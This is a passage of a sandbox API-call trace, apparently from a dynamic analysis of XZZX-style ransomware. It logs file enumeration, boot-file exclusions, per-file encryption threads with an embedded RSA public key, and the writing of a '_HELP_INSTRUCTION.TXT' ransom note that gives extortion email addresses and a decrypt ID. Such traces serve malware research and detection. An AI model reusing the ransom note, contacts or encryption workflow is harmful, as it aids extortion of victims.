returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" [0256.970] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" [0256.970] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\*.*" [0256.970] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3cdecd8 [0256.970] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm") returned="wpc5n64XVm" [0256.970] lstrcpyW (in: lpString1=0x17a5a4, lpString2="wpc5n64XVm" | out: lpString1="wpc5n64XVm") returned="wpc5n64XVm" [0256.970] StrStrW (lpFirst="04BF022041D4F9A43C1202C84609DDEC.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0256.970] StrStrW (lpFirst="04BF022041D4F9A43C1202C84609DDEC.XZZX", lpSrch="ntldr") returned 0x0 [0256.970] StrStrW (lpFirst="04BF022041D4F9A43C1202C84609DDEC.XZZX", lpSrch="NTLDR") returned 0x0 [0256.970] StrStrW (lpFirst="04BF022041D4F9A43C1202C84609DDEC.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0256.970] StrStrW (lpFirst="04BF022041D4F9A43C1202C84609DDEC.XZZX", lpSrch="ntdetect.com") returned 0x0 [0256.970] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\", lpSrch="Desktop") returned 0x0 [0256.970] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\", lpSrch="DESKTOP") returned 0x0 [0256.970] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned 59 [0256.970] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0256.970] lstrcpyW (in: lpString1=0x17addc, lpString2="04BF022041D4F9A43C1202C84609DDEC.XZZX" | out: lpString1="04BF022041D4F9A43C1202C84609DDEC.XZZX") returned="04BF022041D4F9A43C1202C84609DDEC.XZZX" [0256.970] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" [0256.970] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1494 [0256.971] Sleep (dwMilliseconds=0x96) [0257.124] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0257.124] lstrcmpW (lpString1="1CB22AF03A177B10110664B53E3C5F58.XZZX", lpString2="..") returned 1 [0257.124] lstrcmpW (lpString1="1CB22AF03A177B10110664B53E3C5F58.XZZX", lpString2=".") returned 1 [0257.124] StrStrW (lpFirst="1CB22AF03A177B10110664B53E3C5F58.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0257.124] StrStrW (lpFirst="1CB22AF03A177B10110664B53E3C5F58.XZZX", lpSrch="ntldr") returned 0x0 [0257.125] StrStrW (lpFirst="1CB22AF03A177B10110664B53E3C5F58.XZZX", lpSrch="NTLDR") returned 0x0 [0257.125] StrStrW (lpFirst="1CB22AF03A177B10110664B53E3C5F58.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0257.125] StrStrW (lpFirst="1CB22AF03A177B10110664B53E3C5F58.XZZX", lpSrch="ntdetect.com") returned 0x0 [0257.125] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\", lpSrch="Desktop") returned 0x0 [0257.125] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\", lpSrch="DESKTOP") returned 0x0 [0257.125] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned 59 [0257.125] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0257.125] lstrcpyW (in: lpString1=0x17addc, lpString2="1CB22AF03A177B10110664B53E3C5F58.XZZX" | out: lpString1="1CB22AF03A177B10110664B53E3C5F58.XZZX") returned="1CB22AF03A177B10110664B53E3C5F58.XZZX" [0257.125] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" [0257.125] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1498 [0257.125] Sleep (dwMilliseconds=0x96) [0257.280] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0257.280] lstrcmpW (lpString1="7B5559382A0FD2B4C13F23862E44B6FC.XZZX", lpString2="..") returned 1 [0257.280] lstrcmpW (lpString1="7B5559382A0FD2B4C13F23862E44B6FC.XZZX", lpString2=".") returned 1 [0257.280] StrStrW (lpFirst="7B5559382A0FD2B4C13F23862E44B6FC.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0257.280] StrStrW (lpFirst="7B5559382A0FD2B4C13F23862E44B6FC.XZZX", lpSrch="ntldr") returned 0x0 [0257.280] StrStrW (lpFirst="7B5559382A0FD2B4C13F23862E44B6FC.XZZX", lpSrch="NTLDR") returned 0x0 [0257.281] StrStrW (lpFirst="7B5559382A0FD2B4C13F23862E44B6FC.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0257.281] StrStrW (lpFirst="7B5559382A0FD2B4C13F23862E44B6FC.XZZX", lpSrch="ntdetect.com") returned 0x0 [0257.281] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\", lpSrch="Desktop") returned 0x0 [0257.281] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\", lpSrch="DESKTOP") returned 0x0 [0257.281] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned 59 [0257.281] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0257.281] lstrcpyW (in: lpString1=0x17addc, lpString2="7B5559382A0FD2B4C13F23862E44B6FC.XZZX" | out: lpString1="7B5559382A0FD2B4C13F23862E44B6FC.XZZX") returned="7B5559382A0FD2B4C13F23862E44B6FC.XZZX" [0257.281] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" [0257.281] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x149c [0257.281] Sleep (dwMilliseconds=0x96) [0257.436] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0257.436] lstrcmpW (lpString1="E3086E520D4EE960428796111173CDA8.XZZX", lpString2="..") returned 1 [0257.436] lstrcmpW (lpString1="E3086E520D4EE960428796111173CDA8.XZZX", lpString2=".") returned 1 [0257.437] StrStrW (lpFirst="E3086E520D4EE960428796111173CDA8.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0257.437] StrStrW (lpFirst="E3086E520D4EE960428796111173CDA8.XZZX", lpSrch="ntldr") returned 0x0 [0257.437] StrStrW (lpFirst="E3086E520D4EE960428796111173CDA8.XZZX", lpSrch="NTLDR") returned 0x0 [0257.437] StrStrW (lpFirst="E3086E520D4EE960428796111173CDA8.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0257.437] StrStrW (lpFirst="E3086E520D4EE960428796111173CDA8.XZZX", lpSrch="ntdetect.com") returned 0x0 [0257.437] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\", lpSrch="Desktop") returned 0x0 [0257.437] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\", lpSrch="DESKTOP") returned 0x0 [0257.437] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned 59 [0257.437] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0257.437] lstrcpyW (in: lpString1=0x17addc, lpString2="E3086E520D4EE960428796111173CDA8.XZZX" | out: lpString1="E3086E520D4EE960428796111173CDA8.XZZX") returned="E3086E520D4EE960428796111173CDA8.XZZX" [0257.437] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" [0257.437] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x14a0 [0257.437] WaitForSingleObject (hHandle=0x14a0, dwMilliseconds=0xffffffff) returned 0x0 [0257.438] Sleep (dwMilliseconds=0x96) [0257.592] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0257.592] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0257.592] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0257.592] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0257.593] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0257.593] FindClose (in: hFindFile=0x3cdecd8 | out: hFindFile=0x3cdecd8) returned 1 [0257.593] FindClose (in: hFindFile=0x3cdecd8 | out: hFindFile=0x3cdecd8) returned 0 [0257.593] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm" [0257.593] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\*.*" [0257.593] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\", lpSrch="Desktop") returned 0x0 [0257.593] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\", lpSrch="DESKTOP") returned 0x0 [0257.593] SetErrorMode (uMode=0x1) returned 0x1 [0257.593] wsprintfW (in: param_1=0x17a39c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\_HELP_INSTRUCTION.TXT") returned 76 [0257.593] GetUserNameW (in: lpBuffer=0x178178, pcbBuffer=0x177f64 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x177f64) returned 1 [0257.593] wsprintfW (in: param_1=0x177f70, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0257.593] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x177f6c | out: phkResult=0x177f6c*=0x14a4) returned 0x0 [0257.593] RegQueryValueExW (in: hKey=0x14a4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43df600, lpcbData=0x177f68*=0x104 | out: lpType=0x0, lpData=0x43df600*=0x65, lpcbData=0x177f68*=0x4a) returned 0x0 [0257.593] RegCloseKey (hKey=0x14a4) returned 0x0 [0257.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17939c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0257.593] wsprintfW (in: param_1=0x17839c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0257.593] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\wpc5n64xvm\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14a4 [0257.594] CloseHandle (hObject=0x14a4) returned 1 [0257.594] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3cdecd8 [0257.594] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm") returned="wpc5n64XVm" [0257.594] lstrcpyW (in: lpString1=0x17a5a4, lpString2="wpc5n64XVm" | out: lpString1="wpc5n64XVm") returned="wpc5n64XVm" [0257.594] lstrcpyW (in: lpString1=0x17f6b0, lpString2="C:\\Users" | out: lpString1="C:\\Users") returned="C:\\Users" [0257.594] lstrcatW (in: lpString1="C:\\Users", lpString2="\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\" [0257.594] lstrcatW (in: lpString1="C:\\Users\\", lpString2="All Users" | out: lpString1="C:\\Users\\All Users") returned="C:\\Users\\All Users" [0257.594] SetErrorMode (uMode=0x1) returned 0x1 [0257.594] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\All Users" | out: lpString1="C:\\Users\\All Users") returned="C:\\Users\\All Users" [0257.594] lstrcatW (in: lpString1="C:\\Users\\All Users", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\") returned="C:\\Users\\All Users\\" [0257.594] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\All Users\\" | out: lpString1="C:\\Users\\All Users\\") returned="C:\\Users\\All Users\\" [0257.594] lstrcatW (in: lpString1="C:\\Users\\All Users\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\*.*") returned="C:\\Users\\All Users\\*.*" [0257.594] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\*.*", lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0x3cdea18 [0257.594] PathFindFileNameW (pszPath="C:\\Users\\All Users") returned="All Users" [0257.594] lstrcpyW (in: lpString1=0x17d784, lpString2="All Users" | out: lpString1="All Users") returned="All Users" [0257.594] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\All Users" | out: lpString1="C:\\Users\\All Users") returned="C:\\Users\\All Users" [0257.594] lstrcatW (in: lpString1="C:\\Users\\All Users", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\*.*") returned="C:\\Users\\All Users\\*.*" [0257.594] StrStrW (lpFirst="C:\\Users\\All Users\\", lpSrch="Desktop") returned 0x0 [0257.594] StrStrW (lpFirst="C:\\Users\\All Users\\", lpSrch="DESKTOP") returned 0x0 [0257.594] SetErrorMode (uMode=0x1) returned 0x1 [0257.594] wsprintfW (in: param_1=0x17d57c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\All Users\\_HELP_INSTRUCTION.TXT") returned 40 [0257.594] GetUserNameW (in: lpBuffer=0x17b358, pcbBuffer=0x17b144 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17b144) returned 1 [0257.595] wsprintfW (in: param_1=0x17b150, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0257.595] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17b14c | out: phkResult=0x17b14c*=0x14a8) returned 0x0 [0257.595] RegQueryValueExW (in: hKey=0x14a8, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43e3d00, lpcbData=0x17b148*=0x104 | out: lpType=0x0, lpData=0x43e3d00*=0x65, lpcbData=0x17b148*=0x4a) returned 0x0 [0257.595] RegCloseKey (hKey=0x14a8) returned 0x0 [0257.595] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17c57c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0257.595] wsprintfW (in: param_1=0x17b57c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0257.595] CreateFileW (lpFileName="C:\\Users\\All Users\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\all users\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14a8 [0257.595] CloseHandle (hObject=0x14a8) returned 1 [0257.595] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\*.*", lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0x3cdea18 [0257.595] PathFindFileNameW (pszPath="C:\\Users\\All Users") returned="All Users" [0257.595] lstrcpyW (in: lpString1=0x17d784, lpString2="All Users" | out: lpString1="All Users") returned="All Users" [0257.595] lstrcpyW (in: lpString1=0x17f6b0, lpString2="C:\\Users" | out: lpString1="C:\\Users") returned="C:\\Users" [0257.595] lstrcatW (in: lpString1="C:\\Users", lpString2="\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\" [0257.595] lstrcatW (in: lpString1="C:\\Users\\", lpString2="Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0257.595] SetErrorMode (uMode=0x1) returned 0x1 [0257.595] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0257.595] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0257.595] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0257.595] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\*.*") 